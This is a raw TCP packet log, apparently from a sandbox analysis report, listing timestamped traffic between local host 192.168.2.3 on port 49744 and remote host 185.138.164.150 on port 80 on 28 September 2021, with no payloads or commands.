Sep 28, 2021 08:53:38.116466045 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.116502047 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.141128063 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.141185999 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.141238928 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.141299963 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.141346931 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.141386032 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.141403913 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.141422033 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.141427994 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.141458035 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.141513109 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.141530037 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.141565084 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.141616106 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.141629934 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.141668081 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.141725063 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.141727924 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.141782045 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.141832113 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.141840935 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.142712116 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.142802000 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.142971992 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.143026114 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.143100977 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.144541979 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.144593954 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.144649982 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.144695997 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.144705057 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.144757986 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.144773006 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.144818068 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.144881010 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.145318985 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.145379066 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.145473957 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.146323919 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.146380901 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.146433115 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.146485090 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.146545887 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.146579027 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.148248911 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.148293018 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.148354053 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.148390055 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.148411036 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.148477077 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.149720907 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.149765015 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.149811983 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.149851084 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.149899960 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.149943113 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.149971962 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.150002003 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.150012970 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.150027037 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.150031090 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.150051117 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.150099993 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.150120974 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.150144100 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.150180101 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.150201082 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.150218964 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.150254011 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.150257111 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.150294065 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.150331020 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.150367022 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.150367975 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.150415897 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.150450945 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.150459051 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.150495052 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.150507927 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.150533915 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.150572062 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.150598049 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.150667906 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.153482914 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.153547049 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.153590918 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.153628111 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.153779030 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.176940918 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.177000046 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.177040100 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.177086115 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.177128077 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.177166939 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.177202940 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.177206993 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.177243948 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.177246094 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.177284956 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.177319050 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.177323103 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.177361012 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.177407980 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.177437067 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.177449942 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.177488089 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.177522898 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.177525997 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.177568913 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.177968025 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.178008080 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.178040981 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.178055048 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.178098917 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.178128004 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.180277109 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.180319071 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.180356026 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.180388927 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.180394888 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.180433989 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.180459023 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.180469990 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.180507898 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.180546045 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.180572987 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.180649996 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.183685064 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.183747053 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.183796883 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.183800936 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.183836937 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.183933020 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.184020996 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.184070110 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.184108973 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.184124947 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.184165001 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.184192896 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.185405016 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.185456991 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.185503006 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.185514927 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.185569048 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.185595989 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.185625076 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.185671091 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.185697079 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.185729027 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.185771942 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.185792923 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.185807943 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.185864925 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.185888052 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.185920954 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.185970068 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.185986996 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.186028004 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.186075926 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.186098099 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.186125994 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.186166048 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.186196089 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.186202049 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.186240911 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.186288118 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.186403990 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.186444998 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.186476946 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.186482906 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.186518908 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.186559916 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.189001083 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.189049959 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.189086914 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.189136028 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.189167023 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.189280987 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.212567091 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.212661982 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.212707043 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.212743998 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.212783098 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.212822914 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.212872028 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.212907076 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.212935925 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.212976933 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.213016987 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.213043928 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.213047981 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.213082075 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.213085890 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.213088036 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.213108063 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.213134050 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.213176966 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.213180065 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.213213921 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.213251114 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.213304996 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.213304996 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.213347912 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.215543032 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.215590000 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.215626955 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.215673923 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.215677023 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.215713024 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.215717077 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.215754986 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.215794086 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.215831995 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.215832949 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.215868950 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.215908051 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.215908051 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.215946913 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.218478918 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.218590021 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.218868017 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.218909979 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.218949080 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.218985081 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.218993902 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.219024897 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.219062090 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.219063997 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.219181061 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.221317053 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.221368074 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.221431017 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.221436024 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.221470118 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.221508026 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.221570015 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.221604109 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.221643925 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.221683025 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.221719980 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.221757889 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.221797943 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.221925974 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.221966982 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.222004890 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.222043037 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.222052097 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.222095013 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.222103119 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.222134113 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.222172976 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.222173929 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.222213984 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.222249985 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.222284079 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.222290039 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.222327948 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.222330093 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.222376108 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.222436905 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.224071026 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.224114895 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.224152088 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.224168062 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.224190950 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.224205971 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.224230051 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.224266052 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.224282026 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.248725891 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.248831987 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.249003887 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.249114990 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.249141932 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.249146938 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.249221087 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.249281883 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.249315977 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.249341965 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.249399900 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.249403000 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.249464035 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.249526024 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.249532938 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.249605894 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.249667883 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.249679089 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.249732971 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.249794006 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.249797106 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.249855042 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.249912024 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.249913931 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.249974966 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.250042915 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.250052929 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.251235008 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.251308918 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.251346111 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.251379013 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.251451969 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.251461983 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.251513958 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.251574993 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.251575947 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.251637936 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.251694918 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.251724958 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.251753092 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.251811028 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.251847029 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.253647089 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.253865004 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.253935099 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.253966093 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.254065037 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.254107952 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.254146099 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.254184961 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.254220963 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.254190922 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.254362106 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.254373074 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.256689072 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.256741047 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.256783009 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.256820917 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.256858110 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:38.256828070 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.256892920 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:38.256900072 CEST	80	49744	185.138.164.150	192.168.2.3
